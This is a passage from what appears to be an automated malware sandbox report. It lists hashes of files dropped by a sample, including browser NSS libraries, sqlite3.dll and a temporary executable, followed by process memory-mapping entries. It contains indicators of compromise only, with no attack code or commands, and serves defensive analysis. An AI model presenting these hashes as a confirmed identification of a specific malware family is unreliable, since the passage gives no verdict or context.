                                                                                    df390bc8a088b51d27253fed32186361

                                                                                    SHA1

                                                                                    69e6a59300fc04ef5ab53cbe061b8b2aefe375a4

                                                                                    SHA256

                                                                                    4388b3b4aaccededcd9a2d864ba85967c08a4586dee2745e5539e12cb4de5c5f

                                                                                    SHA512

                                                                                    4d0d050afd8809b9090e0ac8ab4f00ad4237723bfa8adb2f605fbbdd6be532bd941bccf79b7fbc0d226bc7890c2011dd18b0263af5b81911e1c8def2d9f235c8

                                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\kzava2dl\kzava2dl.cmdline
                                                                                    MD5

                                                                                    42e85d189fa21cae8ed8d84acef283a9

                                                                                    SHA1

                                                                                    621847d149bf3781b8856a0acf0bf368c6743818

                                                                                    SHA256

                                                                                    47468683d4153e73f4b2b26ac0a4fdeab4ca8db4171b954acea60523d4b7ffc0

                                                                                    SHA512

                                                                                    a9219f301a8490cc679ad340d111c28f2f5166507ce24499d25e46bdda99d180e5e812912ce624fcd174a1f1fb293c943ea336ef46fca920c6418b50bbe6f0cc

                                                                                  • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll
                                                                                    MD5

                                                                                    60acd24430204ad2dc7f148b8cfe9bdc

                                                                                    SHA1

                                                                                    989f377b9117d7cb21cbe92a4117f88f9c7693d9

                                                                                    SHA256

                                                                                    9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97

                                                                                    SHA512

                                                                                    626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

                                                                                  • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll
                                                                                    MD5

                                                                                    60acd24430204ad2dc7f148b8cfe9bdc

                                                                                    SHA1

                                                                                    989f377b9117d7cb21cbe92a4117f88f9c7693d9

                                                                                    SHA256

                                                                                    9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97

                                                                                    SHA512

                                                                                    626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

                                                                                  • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\mozglue.dll
                                                                                    MD5

                                                                                    eae9273f8cdcf9321c6c37c244773139

                                                                                    SHA1

                                                                                    8378e2a2f3635574c106eea8419b5eb00b8489b0

                                                                                    SHA256

                                                                                    a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc

                                                                                    SHA512

                                                                                    06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

                                                                                  • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\msvcp140.dll
                                                                                    MD5

                                                                                    109f0f02fd37c84bfc7508d4227d7ed5

                                                                                    SHA1

                                                                                    ef7420141bb15ac334d3964082361a460bfdb975

                                                                                    SHA256

                                                                                    334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

                                                                                    SHA512

                                                                                    46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

                                                                                  • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\nss3.dll
                                                                                    MD5

                                                                                    02cc7b8ee30056d5912de54f1bdfc219

                                                                                    SHA1

                                                                                    a6923da95705fb81e368ae48f93d28522ef552fb

                                                                                    SHA256

                                                                                    1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                                                                                    SHA512

                                                                                    0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                                                                                  • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\softokn3.dll
                                                                                    MD5

                                                                                    4e8df049f3459fa94ab6ad387f3561ac

                                                                                    SHA1

                                                                                    06ed392bc29ad9d5fc05ee254c2625fd65925114

                                                                                    SHA256

                                                                                    25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871

                                                                                    SHA512

                                                                                    3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

                                                                                  • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\vcruntime140.dll
                                                                                    MD5

                                                                                    7587bf9cb4147022cd5681b015183046

                                                                                    SHA1

                                                                                    f2106306a8f6f0da5afb7fc765cfa0757ad5a628

                                                                                    SHA256

                                                                                    c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

                                                                                    SHA512

                                                                                    0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

                                                                                  • \Users\Admin\AppData\LocalLow\sqlite3.dll
                                                                                    MD5

                                                                                    f964811b68f9f1487c2b41e1aef576ce

                                                                                    SHA1

                                                                                    b423959793f14b1416bc3b7051bed58a1034025f

                                                                                    SHA256

                                                                                    83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7

                                                                                    SHA512

                                                                                    565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

                                                                                  • \Users\Admin\AppData\Local\Temp\UZpYJc1ETn.exe
                                                                                    MD5

                                                                                    aa80d5960e65ac46ad446c09c1a17608

                                                                                    SHA1

                                                                                    c2468b1792e5ecef461d2d89470e8438c05cce24

                                                                                    SHA256

                                                                                    857ddc8de567afa19f5bc9236f6cf3681e46919530f90acc25ff36112564432c

                                                                                    SHA512

                                                                                    07e15d76dc1940e0b3a926cfa6a5d92760525ae7f9e54bc8c691f1c9ea8af71ffe818aa347857a5c1435316d152a262a1875f03f465bc7be36a10e73bab6022b

                                                                                  • \Users\Admin\AppData\Local\Temp\UZpYJc1ETn.exe
                                                                                    MD5

                                                                                    aa80d5960e65ac46ad446c09c1a17608

                                                                                    SHA1

                                                                                    c2468b1792e5ecef461d2d89470e8438c05cce24

                                                                                    SHA256

                                                                                    857ddc8de567afa19f5bc9236f6cf3681e46919530f90acc25ff36112564432c

                                                                                    SHA512

                                                                                    07e15d76dc1940e0b3a926cfa6a5d92760525ae7f9e54bc8c691f1c9ea8af71ffe818aa347857a5c1435316d152a262a1875f03f465bc7be36a10e73bab6022b

                                                                                  • \Windows\Branding\mediasrv.png
                                                                                    MD5

                                                                                    1da8e368cb917044f7440a54d79f6737

                                                                                    SHA1

                                                                                    df60dd7011bc948f3b871b1a6cb149a7028c1a85

                                                                                    SHA256

                                                                                    dce86185269e01eba9301b761ae9a002054713060e35dbc908d44ddd8e647bd4

                                                                                    SHA512

                                                                                    8437463516b7da13a661d5acdadd8d52641464e797831e635d697aa863c2c01b3f15be67073d08f2d9361f639b4ee1eaf9a0c8b2811f3cd3d78c43e55651fa92

                                                                                  • \Windows\Branding\mediasvc.png
                                                                                    MD5

                                                                                    009e8b6a916836a4a8aa2be3229276a1

                                                                                    SHA1

                                                                                    28f3892fb8b63e7299dce25cb65bf252e29d5afd

                                                                                    SHA256

                                                                                    39ec650a006fc423825d552edf526443c96b5a027f58e6423e6344d90b228ab7

                                                                                    SHA512

                                                                                    a47a29ce28659d2839d808a614d9537fdcefcc08509f5e0cab0c747ebb7f04453781647e475934b4db5e254127e8621cedab01efd425fb5af23cac8dfcf9d7dc

                                                                                  • memory/268-201-0x0000000000000000-mapping.dmp
                                                                                  • memory/276-75-0x0000000000000000-mapping.dmp
                                                                                  • memory/304-191-0x0000000000000000-mapping.dmp
                                                                                  • memory/428-189-0x0000000000000000-mapping.dmp
                                                                                  • memory/552-92-0x000000001ADE0000-0x000000001ADE1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/552-86-0x000000001AF40000-0x000000001AF41000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/552-102-0x00000000029C0000-0x00000000029C1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/552-103-0x000000001B970000-0x000000001B971000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/552-104-0x0000000002540000-0x0000000002541000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/552-100-0x0000000001FF0000-0x0000000001FF1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/552-83-0x0000000000000000-mapping.dmp
                                                                                  • memory/552-90-0x0000000002480000-0x0000000002481000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/552-84-0x000007FEFB6A1000-0x000007FEFB6A3000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/552-175-0x000000001C820000-0x000000001C821000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/552-85-0x0000000001DB0000-0x0000000001DB1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/552-88-0x000000001AEC0000-0x000000001AEC2000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/552-87-0x0000000002450000-0x0000000002451000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/552-119-0x000000001AECA000-0x000000001AEE9000-memory.dmp
                                                                                    Filesize

                                                                                    124KB

                                                                                  • memory/552-89-0x000000001AEC4000-0x000000001AEC6000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/556-180-0x0000000000000000-mapping.dmp
                                                                                  • memory/560-183-0x0000000000000000-mapping.dmp
                                                                                  • memory/572-223-0x0000000000000000-mapping.dmp
                                                                                  • memory/636-197-0x0000000000000000-mapping.dmp
                                                                                  • memory/852-179-0x0000000000000000-mapping.dmp
                                                                                  • memory/864-184-0x0000000000000000-mapping.dmp
                                                                                  • memory/960-185-0x0000000000000000-mapping.dmp
                                                                                  • memory/984-181-0x0000000000000000-mapping.dmp
                                                                                  • memory/1028-196-0x0000000000000000-mapping.dmp
                                                                                  • memory/1072-212-0x0000000000000000-mapping.dmp
                                                                                  • memory/1076-182-0x0000000000000000-mapping.dmp
                                                                                  • memory/1108-194-0x0000000000000000-mapping.dmp
                                                                                  • memory/1316-200-0x0000000000000000-mapping.dmp
                                                                                  • memory/1316-206-0x0000000000000000-mapping.dmp
                                                                                  • memory/1360-209-0x0000000000000000-mapping.dmp
                                                                                  • memory/1360-225-0x0000000000000000-mapping.dmp
                                                                                  • memory/1364-222-0x0000000000000000-mapping.dmp
                                                                                  • memory/1508-76-0x0000000000000000-mapping.dmp
                                                                                  • memory/1548-187-0x0000000000000000-mapping.dmp
                                                                                  • memory/1548-226-0x0000000000000000-mapping.dmp
                                                                                  • memory/1552-146-0x00000000025C4000-0x00000000025C6000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1552-152-0x0000000002670000-0x0000000002671000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1552-139-0x0000000000000000-mapping.dmp
                                                                                  • memory/1552-145-0x00000000025C0000-0x00000000025C2000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1552-147-0x000000001A900000-0x000000001A901000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1552-149-0x000000001B790000-0x000000001B791000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1552-151-0x000000001B4C0000-0x000000001B4C1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1576-214-0x0000000000000000-mapping.dmp
                                                                                  • memory/1588-220-0x0000000019354000-0x0000000019356000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1588-215-0x0000000000000000-mapping.dmp
                                                                                  • memory/1588-219-0x0000000019350000-0x0000000019352000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1588-192-0x0000000000000000-mapping.dmp
                                                                                  • memory/1588-221-0x000000001935A000-0x0000000019379000-memory.dmp
                                                                                    Filesize

                                                                                    124KB

                                                                                  • memory/1616-105-0x0000000000000000-mapping.dmp
                                                                                  • memory/1616-111-0x000000001AB40000-0x000000001AB42000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1616-112-0x000000001AB44000-0x000000001AB46000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1616-138-0x000000001B7E0000-0x000000001B7E1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1616-113-0x0000000002580000-0x0000000002581000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1616-115-0x000000001B740000-0x000000001B741000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1616-117-0x00000000026B0000-0x00000000026B1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1616-118-0x00000000023C0000-0x00000000023C1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1616-137-0x000000001B7D0000-0x000000001B7D1000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1616-124-0x000000001B530000-0x000000001B531000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1652-93-0x0000000000000000-mapping.dmp
                                                                                  • memory/1672-186-0x0000000000000000-mapping.dmp
                                                                                  • memory/1680-195-0x0000000000000000-mapping.dmp
                                                                                  • memory/1696-173-0x000000001AD60000-0x000000001AD62000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1696-193-0x0000000000000000-mapping.dmp
                                                                                  • memory/1696-174-0x000000001AD64000-0x000000001AD66000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1696-160-0x0000000000000000-mapping.dmp
                                                                                  • memory/1724-176-0x0000000000000000-mapping.dmp
                                                                                  • memory/1724-211-0x0000000000000000-mapping.dmp
                                                                                  • memory/1724-205-0x0000000000000000-mapping.dmp
                                                                                  • memory/1764-208-0x0000000000000000-mapping.dmp
                                                                                  • memory/1764-202-0x0000000000000000-mapping.dmp
                                                                                  • memory/1768-178-0x0000000000000000-mapping.dmp
                                                                                  • memory/1780-77-0x0000000041820000-0x0000000041C41000-memory.dmp
                                                                                    Filesize

                                                                                    4.1MB

                                                                                  • memory/1780-80-0x0000000041374000-0x0000000041376000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1780-81-0x0000000041376000-0x0000000041377000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1780-82-0x0000000041377000-0x0000000041378000-memory.dmp
                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1780-73-0x0000000000000000-mapping.dmp
                                                                                  • memory/1780-79-0x0000000041372000-0x0000000041374000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1840-190-0x0000000000000000-mapping.dmp
                                                                                  • memory/1864-204-0x0000000000000000-mapping.dmp
                                                                                  • memory/1864-210-0x0000000000000000-mapping.dmp
                                                                                  • memory/1896-203-0x0000000000000000-mapping.dmp
                                                                                  • memory/1972-213-0x0000000000000000-mapping.dmp
                                                                                  • memory/1992-188-0x0000000000000000-mapping.dmp
                                                                                  • memory/2020-62-0x0000000000400000-0x0000000000496000-memory.dmp
                                                                                    Filesize

                                                                                    600KB

                                                                                  • memory/2020-207-0x0000000000000000-mapping.dmp
                                                                                  • memory/2020-61-0x0000000000250000-0x00000000002E1000-memory.dmp
                                                                                    Filesize

                                                                                    580KB

                                                                                  • memory/2020-60-0x00000000754F1000-0x00000000754F3000-memory.dmp
                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/2028-96-0x0000000000000000-mapping.dmp